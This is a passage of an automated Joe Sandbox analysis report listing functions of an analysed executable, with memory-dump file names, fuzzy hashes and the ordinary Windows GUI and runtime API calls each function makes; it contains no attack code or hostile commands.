                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 642888154-0
                                                                                        • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                        • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                        • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                        • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Enable$Show$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 1871949834-0
                                                                                        • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                        • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                        • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                        • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                        • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                        • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                        • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                        APIs
                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                        • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                        • SendMessageW.USER32 ref: 00471AE3
                                                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                        • String ID:
                                                                                        • API String ID: 3611059338-0
                                                                                        • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                        • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                        • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                        • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                        • String ID:
                                                                                        • API String ID: 1640429340-0
                                                                                        • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                        • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                        • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                        • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                        APIs
                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                        • _wcslen.LIBCMT ref: 004438CD
                                                                                        • _wcslen.LIBCMT ref: 004438E6
                                                                                        • _wcstok.LIBCMT ref: 004438F8
                                                                                        • _wcslen.LIBCMT ref: 0044390C
                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                        • _wcstok.LIBCMT ref: 00443931
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 3632110297-0
                                                                                        • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                        • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                        • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                        • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                        • String ID:
                                                                                        • API String ID: 752480666-0
                                                                                        • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                        • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                        • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                        • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                        • String ID:
                                                                                        • API String ID: 3275902921-0
                                                                                        • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                        • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                        • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                        • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                        • String ID:
                                                                                        • API String ID: 3275902921-0
                                                                                        • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                        • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                        • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                        • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                        • String ID:
                                                                                        • API String ID: 2833360925-0
                                                                                        • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                        • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                        • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                        • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                        APIs
                                                                                        • SendMessageW.USER32 ref: 004555C7
                                                                                        • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3691411573-0
                                                                                        • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                        • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                        • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                        • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                        APIs
                                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                        • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                        • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                        • EndPath.GDI32(?), ref: 004472D6
                                                                                        • StrokePath.GDI32(?), ref: 004472E4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                        • String ID:
                                                                                        • API String ID: 372113273-0
                                                                                        • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                        • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                        • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                        • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$Release
                                                                                        • String ID:
                                                                                        • API String ID: 1035833867-0
                                                                                        • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                        • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                        • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                        • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 0041708E
                                                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                        • __amsg_exit.LIBCMT ref: 004170AE
                                                                                        • __lock.LIBCMT ref: 004170BE
                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                        • _free.LIBCMT ref: 004170EE
                                                                                        • InterlockedIncrement.KERNEL32(02FC2D00), ref: 00417106
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                        • String ID:
                                                                                        • API String ID: 3470314060-0
                                                                                        • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                                        • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                        • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                                                        • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                        • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                          • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
